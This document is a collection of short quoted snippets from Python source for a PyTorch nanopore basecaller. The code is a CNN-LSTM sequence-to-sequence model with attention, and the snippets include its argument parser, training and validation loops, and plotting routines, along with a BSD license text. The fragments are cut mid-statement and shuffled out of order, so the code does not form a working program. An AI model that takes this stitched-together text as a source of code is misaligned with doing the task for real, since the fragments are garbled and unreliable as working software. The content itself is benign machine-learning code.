"<= other <= self.end def make_argparser(): parser = argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input', required",
"of not padded elements loss = criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss += loss.item() running_loss_train",
"max_label_len, y, teacher_forcing_ratio, hidden, true_y_len, y_class, random_value, mode_type, beam_width=1): # Forward pass through",
"plt.clf() if split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for x in y_len_biases] df_b",
":] c = hidden[1][:, not_padded_batches, :] hidden = (h, c) label = y[not_padded_batches,",
"* n_epochs)*0.5) and teacher_forcing_ratio >= 0.5: if (running_acc_train / float(make_validation)) > 0.35 and",
"of your choosing if clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update encoder and",
"import itertools import seaborn as sns import pandas as pd import argparse from",
"as nn from torch.autograd import Variable import torch.nn.functional as F import torchvision import",
"input[2], input[4] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax =",
"as pdf: plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD)",
"plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates\") if pdf is not None:",
"Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)),",
"= list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len), len(x_len))) input_grad = np.zeros((len(y_len), len(x_len))) if split_LSTMbiases: y_len_biases",
":] encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### ##### Sorting ############################# ########################################### #### sort",
"args.input_bias_cnn strides = args.strides kernel = args.kernel cnn_out = args.channel_number #256 pooling_type =",
"SOS token = 1 [batch size, SOS token] for i in max_for: #",
"= torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def get_train_loader(tensor_x,",
"= data_val[1] seq_len_val = data_val[2] lab_len_val = data_val[3] batch_y10_val = data_val[4] inputs_val, labels_val,",
"hidden): h, c = hidden h = h.view(h.size(0), -1) c = c.view(c.size(0), -1)",
"label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates\") if editD: ax",
"= os.path.dirname(os.path.realpath('__file__')) # script directory file_out = script_dir + \"/\" + infile print(file_out)",
"lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim = hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional = bidir,",
"# early stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--patience', type=int, default=25, help=\"Patience",
"self.attn = nn.Linear(self.hidden_dim * 2, 1) #self.attn = nn.Linear(self.hidden_dim * 2, self.hidden_dim) self.linear",
"Decoder ############################# ########################################### #### LSTM random_value = random.random() out_decoder, decoder_hidden = self.lstm_decoder( sorted_encoder_output,",
"0: # ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) # ed2 = ed # else:",
"verbose=True, delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in = {} dict_activations_forget = {} dict_activations_cell =",
"half of updates= \", int((len(train_loader) * n_epochs)*0.5)) # Backward pass loss.backward() #clipping_value =",
"gates = self.i2h(x) + self.h2h(h) ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1) ingate",
"is not None: input_x_val = val_ds[0] input_y_val = val_ds[1] input_y10_val = val_ds[2] signal_len_val",
"attention = args.attention dropout = args.dropout # CNN input_bias_cnn = args.input_bias_cnn strides =",
"cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) # ingate start, end = 0, n//4 #",
"shuffle=shuffle) # create your dataloader return(train_loader) def convert_to_string(pred, target, target_lengths): import editdistance vocab",
"# shape of lstm_in: [batch, input_dim] # shape of lstm_out: [seq_len, batch, output_dim]",
"in enumerate(val_loader): batch_x_val = data_val[0] batch_y_val = data_val[1] seq_len_val = data_val[2] lab_len_val =",
"n//4 input_biases[idx_b, idx] = np.linalg.norm(m[start: end], ord=2) # forget gate start, end =",
"= dropout_on, dropout_p = dropout_probability, dropout_input = dropout_input, input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1] lstm",
"out_dim) #decide if we are going to use teacher forcing or not teacher_force",
"print(f'The model has {count_parameters(model12):,} trainable parameters') f = open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile",
"df_b = pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2",
"criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has {count_parameters(model12):,} trainable parameters') f = open(save_files_path +",
"torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_decoder",
"else onehot # [batch size, out dim] return outputs, hidden # Sequence to",
"#Loop for n_epochs for epoch in range(n_epochs): if earlyStopping and early_stopping.early_stop: # break",
"epoch_loss += loss.item() running_loss_train += loss.item() acc = (reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item()",
"/ reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val running_acc_val += acc_val val_acc.append(acc_val) if editD: ed_val, num_char_ref",
"dict_validation_acc[epoch] = val_acc if editD: dict_validation_editd[epoch] = val_editd # early_stopping needs the validation",
"random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True # Load data dict_classes = {0:",
"gate\", \"forget gate\", \"cell activation\", \"out gate\"]): i += 1 ax = fig.add_subplot(2,",
"= {} dict_weights = {} dict_gradients = {} running_loss_train = 0.0 running_loss_val =",
"inputs, seq_len, teacher_forcing_ratio, labels=None, lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1): ########################################### ##### Encoder #############################",
"seq_len ########################################### ##### Decoder ############################# ########################################### #### LSTM random_value = random.random() out_decoder, decoder_hidden",
"BSD 2-Clause License Copyright (c) 2021 (<EMAIL>) All rights reserved. Redistribution and use",
"dropout = dropout_on, dropout_p = dropout_probability, dropout_input = dropout_input, input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1]",
"and decoder must have equal batch size!\" def forward(self, inputs, seq_len, teacher_forcing_ratio, labels=None,",
"if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases =",
"of conditions and the following disclaimer in the documentation and/or other materials provided",
"zero optimizer.zero_grad() batch_x = data[0] batch_y = data[1] seq_len = data[2] lab_len =",
"= torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset,",
"(<EMAIL>) All rights reserved. Redistribution and use in source and binary forms, with",
"* c) + (ingate * cellgate) hy = outgate * F.tanh(cy) #print(\"hy\", hy.size())",
"= h.view(h.size(0), -1) c = c.view(c.size(0), -1) x = x.view(x.size(0), -1) # Linear",
"what we'll initialise our hidden state as return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size,",
"editD: dict_validation_editd[epoch] = val_editd # early_stopping needs the validation loss to check if",
"shape of lstm_out: [seq_len, batch, output_dim] # shape of self.hidden: (a, b), where",
"bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1) loss_train, acc_train, editd_train = input[0], input[2],",
"top=2, hspace=0.2, wspace=0.5) i = 0 for p, label in zip(input, [\"input gate\",",
"ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_train.values())))], label=\"training",
"args.output port = args.gpu_port SEED = args.set_seed batch = args.batch_size epochs = args.epochs",
"code must retain the above copyright notice, this list of conditions and the",
"x:bool(strtobool(x)), nargs='?', const=True, default=False) # LSTM arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True)",
"decay\") parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--gradient_clip',",
"arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('--dropout', type=float, default=Range(0.0, 1.0), help=\"Dropout probability",
"{count_parameters(model12):,} trainable parameters') f = open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile + \" \\n\")",
"channels in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int, default=1, help=\"Number of layers in Encoder-CNN\") parser.add_argument('--pooling_type',",
"/ float(iteration + 1)) * 100), \"Val Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val + 1)),",
"+= ed_val running_editd_val += ed_val val_editd.append(ed_val) total_ed += ed_val total_num_chars += num_char_ref if",
"Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates]",
"#writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train #/ float(make_validation)",
"----------- class LSTMCellEncoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True): super(LSTMCellEncoder, self).__init__() self.input_size = input_size",
"of the hyperparameters of the training iteration: print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size) print(\"epochs=\",",
"weight_decay, clipping_value, lr)) f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate bias encoder={}, forget",
"# shape of lstm_out: [batch, seq_len, output_dim] # shape of self.hidden: (a, b),",
"= {} dict_training_acc2 = {} dict_validation_acc2 = {} dict_training_editd2 = {} dict_validation_editd2 =",
"super(LSTMCellDecoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias = bias self.i2h =",
"default=256, help=\"Number of hidden units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number of layers",
"svm = sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2 = svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def",
"= 0.0 running_editd_val = 0.0 print(\"=\" * 100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss",
"dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]]) def count_parameters(model): return sum(p.numel() for p in model.parameters() if",
"with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS",
"running_acc_train = 0.0 running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val = 0.0 print(\"=\"",
"(i) >= true seq length if i >= true_y_len[-1].item() and len(true_y_len) > 1:",
"= args.dropout # CNN input_bias_cnn = args.input_bias_cnn strides = args.strides kernel = args.kernel",
"# Define the output layer if self.bidirectional: if self.attention: # attention self.attn =",
"clipping_value=clipping_value, val_ds = val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop,",
"in seq: if p == 4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred) encoded_target =",
"the validation loss to check if it has decresed, # and if it",
"Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int, default=256, help=\"Number of hidden units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int,",
"hidden_dim). # Sort instances by sequence length in descending order #print(\"in length\", x_lengths)",
"sig_len, label_len, label10) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False,",
"ecoder_output[sorted_idx_target, :, :] # sort labels so that they match with order in",
"running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train #/ float(make_validation) dict_validation_editd2[updates] =",
"length\", x_lengths) sorted_len, sorted_idx = x_lengths.sort(0, descending=True) index_sorted_idx = sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs",
"super(LSTMencoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers =",
"OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF",
"list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates\") ax = fig.add_subplot(1, 3,",
"0.0 running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val = 0.0 running_editd_train = 0.0",
"#hidden = self.init_hidden() # Forward pass through LSTM layer # shape of lstm_in:",
"batch_size x out_size x seq_length output_val, sorted_labels_val, sorted_labels_len_val = model(inputs_val, seq_len_val, 0, labels_val,",
"is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input, pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig",
"* hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) self.port = port",
"to zero optimizer.zero_grad() batch_x = data[0] batch_y = data[1] seq_len = data[2] lab_len",
"sorted_len.cpu().numpy(), batch_first=True) # Define the LSTM layer lstm_out, hidden = self.lstm(packed_seq) # [seq_len,",
"acc_train, editd_train = input[0], input[2], input[4] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2,",
"= np.linalg.norm(m[start: end], ord=2) # cell gate start, end = n//2, n//2 +",
"length (i) >= true seq length if i >= true_y_len[-1].item() and len(true_y_len) >",
"sorted_idx_target, :] sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens = (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output =",
"backward pass, optimize in_lstm, seq_len_cnn = self.cnn_encoder(inputs, seq_len) in_lstm = torch.transpose(in_lstm, 1, 2)",
"= 0 epoch_acc = 0 epoch_loss_val = 0 epoch_acc_val = 0 epoch_editd_val =",
"#dict_training_editd2[updates] = running_editd_train #/ float(make_validation) dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] =",
"not in name: print(name,param.data.size()) n = param.size(0) # forget gate start, end =",
"earlyStopping: # initialize the early_stopping object early_stopping = EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name, relative=True,",
"= np.zeros((len(y_len_biases), len(x_len))) input_grad_biases = np.zeros((len(y_len_biases), len(x_len))) for idx, u in enumerate(x_len): idx_b",
"default=\"None\", help=\"Pooling type in Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int, default=[1, 1, 1], help=\"Strides in",
"shape of lstm_in: [batch, input_dim] # shape of lstm_out: [seq_len, batch, output_dim] #",
"dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) # Define the",
"Variable object inputs, labels, labels10 = Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False) #",
"y_len] df = pd.DataFrame(input, index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df, linewidths=0.0, edgecolor=\"none\")",
"1 and a few hundreds, e.g. [batch size] = 32 is a good",
"< teacher_forcing_ratio # put on position: seq, 0:true_batch_size, features # rest: seq, true_batch_size:max_seq_len,",
"output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val != 5 # indices of not",
"edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation",
"'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path",
"import EarlyStopping from cnn import SimpleCNN, BasicBlock, SimpleCNN_res from cnn import outputLen_Conv, outputLen_AvgPool,",
"= val_ds[1] input_y10_val = val_ds[2] signal_len_val = val_ds[3] label_len_val = val_ds[4] read_val =",
"4 * hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) self.port =",
"* 30) print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\" * 30) total_train_loss = 0 loss_iteration =",
"(a, b), where a and b both have shape (num_layers, batch_size, hidden_dim). if",
"FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT",
"= hidden_dim self.batch_size = batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_decoder =",
"= val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD)",
"hot encode input input_decoder = label if teacher_force else onehot # [batch size,",
"read_idx, batch_size, shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10, read_idx) # create",
"f.write(\"epochs={}, batch size={}, earlyStopping={}, patience={}, weight decay={}, clipping value={}, lr={}\\n\" .format(epochs, batch, earlyStopping,",
"BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,",
"\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,",
"* hidden_size, bias=bias) # self.reset_parameters() def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for",
"so that padded items in the sequence won't be shown to the LSTM",
"attention=True, dropout=0): super(LSTMdecoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size",
"def __init__(self, input_size, hidden_size, bias=True): super(LSTMCellEncoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size",
"dropout=self.dropout) # self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True) def init_hidden(self): # This is",
"ratio= {}\".format(teacher_forcing_ratio), \", update= \", updates, \", half of updates= \", int((len(train_loader) *",
"!= None) and (updates % make_validation == 0): # or (updates == n_epochs-1)):",
"torch.utils.data import Dataset, DataLoader from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import OneHotEncoder from",
"seconds = divmod(rem, 60) print(\"=\" * 100) checkpoint = { 'updates': out12[-1], 'model':",
"[dict_weights, dict_gradients]]) def count_parameters(model): return sum(p.numel() for p in model.parameters() if p.requires_grad) def",
"F.tanh(cy) return hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our batch shape",
"* cellgate) hy = outgate * F.tanh(cy) #print(\"hy\", hy.size()) hy = torch.unsqueeze(hy, 0).cuda(self.port)",
"open(file_out, 'rb') as handle: read_data = pickle.load(handle) save_files_path = script_dir + '/training_result_{}/'.format(fname) writer",
"= True, help=\"File path to the pickle input file.\") parser.add_argument('-o', '--output', required =",
"start, end = n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start,",
"1, hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch, seq, feature), lstm_in_unroll, hidden =",
"forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) # ingate start, end = 0, n//4",
"None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1) loss_train, acc_train, editd_train =",
"parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set forget gate bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set",
"teacher_forcing_ratio, labels, lab_len, labels10, labels.size(1), mode) output = torch.transpose(output, 0, 1).contiguous() # input",
"hidden[0] hidden2 = hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]],",
"encoded_pred = [] for p in seq: if p == 4: break encoded_pred.append(vocab[int(p.item())])",
"loss # output = (seq*batch, out dim), target = (seq*batch) # Target nicht",
"def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_decoder = False, bidirectional = False,",
"nn.Linear(self.hidden_dim * 4, self.hidden_dim * 2) self.linear = nn.Linear(self.hidden_dim*2, self.output_dim) else: if self.attention:",
"epoch_loss_val = 0 epoch_acc_val = 0 epoch_editd_val = 0 epoch_editd = 0 print(\"=\"",
"on the validation set val_losses = [] val_acc = [] val_editd = []",
"label_len = train_ds[4] read_train = train_ds[5] #Get training data train_loader = get_train_loader_trainVal(input_x, signal_len,",
"out_size, seq_len ########################################### ##### Decoder ############################# ########################################### #### LSTM random_value = random.random() out_decoder,",
"hidden = args.hidden_units #256 forget_bias = args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder num_layers = args.lstm_layers",
"set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True):",
"input_biases[idx_b, idx] = np.linalg.norm(m[start: end], ord=2) # forget gate start, end = n//4,",
"val_set[5].cuda(port)] print(\"train: \", train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation: \", val_set[0].size(), val_set[1].size(),",
"name and \"linear\" not in name: for b in [\"input\", \"forget\", \"cell\", \"output\"]:",
"for n_epochs for epoch in range(n_epochs): if earlyStopping and early_stopping.early_stop: # break epoch",
"self.hidden_dim * 2) self.linear = nn.Linear(self.hidden_dim*2, self.output_dim) else: if self.attention: # attention self.attn",
"has decresed, # and if it has, it will make a checkpoint of",
"bestPerformance2File(input, fname, editD=True): loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2],",
"LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) # Define the LSTM layer lstm_out, hidden",
"not padded sequences true_y_len = true_y_len[not_padded_batches] # remove smallest element = last one",
"to sequence model # ----------- class Seq2Seq(nn.Module): def __init__(self, cnn_encoder, lstm_encoder, lstm_decoder): super().__init__()",
"self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) # Define the output layer",
"total_train_loss = 0 loss_iteration = [] acc_iteration = [] editd_iteration = [] for",
"editd_iteration writer.close() if earlyStopping: checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc,",
"def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1) loss_train, acc_train, editd_train = input[0], input[2], input[4] fig",
"layer # shape of lstm_in: [batch, input_dim] # shape of lstm_out: [seq_len, batch,",
"script directory file_out = script_dir + \"/\" + infile print(file_out) with open(file_out, 'rb')",
"= input[0], input[1], input[2], input[3], input[4], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0,",
"decay={}, clipping value={}, lr={}\\n\" .format(epochs, batch, earlyStopping, patience_earlyStop, weight_decay, clipping_value, lr)) f.write(\"TF={}, reduced",
"a checkpoint of the current model if earlyStopping: early_stopping(np.mean(val_losses), model, optimizer, updates) if",
"= hidden[0] hidden2 = hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2 = torch.cat([hidden2[0:hidden2.size(0):2],",
"= train_ds[0] input_y = train_ds[1] input_y10 = train_ds[2] signal_len = train_ds[3] label_len =",
"+ str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio), \", update= \", updates, \", half of",
"Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set forget gate bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)),",
"end) # ingate start, end = 0, n//4 # ordering ingate, forgetgate, cellgate,",
"pickle input file.\") parser.add_argument('-o', '--output', required = True, help=\"Output folder name\") parser.add_argument('-g', '--gpu_port',",
"self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_encoder",
"sorted_labels, sorted_labels_len = model(inputs, seq_len, teacher_forcing_ratio, labels, lab_len, labels10, labels.size(1), mode) output =",
"name, param in m.named_parameters(): if \"weight\" in name and len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data)",
"torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True # Load data dict_classes = {0: \"A\", 1: \"C\",",
"length, batch size, output dim] top1 = input_decoder.argmax(1) # get argmax of prediction",
"= 0, n//4 input_biases[idx_b, idx] = np.linalg.norm(m[start: end], ord=2) # forget gate start,",
"{} dict_gradients = {} running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train = 0.0",
"= Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False) # batch_size x out_size x seq_length",
"features, seq len y = y[not_padded_batches, :, :] # batch-i, features, seq len",
"not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input, pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig =",
"sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure = svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases: y_len_biases",
"seq_length x out_size # Calculate cross entropy loss # output = (seq*batch, out",
"earlyStopping: checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2,",
"default=[1, 1, 1], help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int, default=[11, 11, 11], help=\"Kernel",
"NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,",
"my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10, read_idx) # create your datset train_loader",
"3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates",
"idx] = np.linalg.norm(m[start: end], ord=2) # output gate start, end = n//2 +",
"len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if i == 1: plt.legend(bbox_to_anchor=(1.05, 1.05))",
"hidden # Sequence to sequence model # ----------- class Seq2Seq(nn.Module): def __init__(self, cnn_encoder,",
"matrix_param[p] input[idx_p, idx] = np.linalg.norm(m, ord=2) if split_LSTMbiases and \"bias\" in p and",
"= sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val != 5 # indices of not padded elements",
"= encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens = (sorted_hiddens1, sorted_hiddens2)",
"acc acc_iteration.append(acc) #if editD: # if updates % make_validation == 0: # ed",
"ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING",
"#self.attn = nn.Linear(self.hidden_dim * 2, self.hidden_dim) self.linear = nn.Linear(self.hidden_dim, self.output_dim) def forward(self, encoder_outputs,",
"loss = criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss += loss.item() running_loss_train += loss.item() acc =",
"end = time.time() hours, rem = divmod(end-start, 3600) minutes, seconds = divmod(rem, 60)",
"loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings",
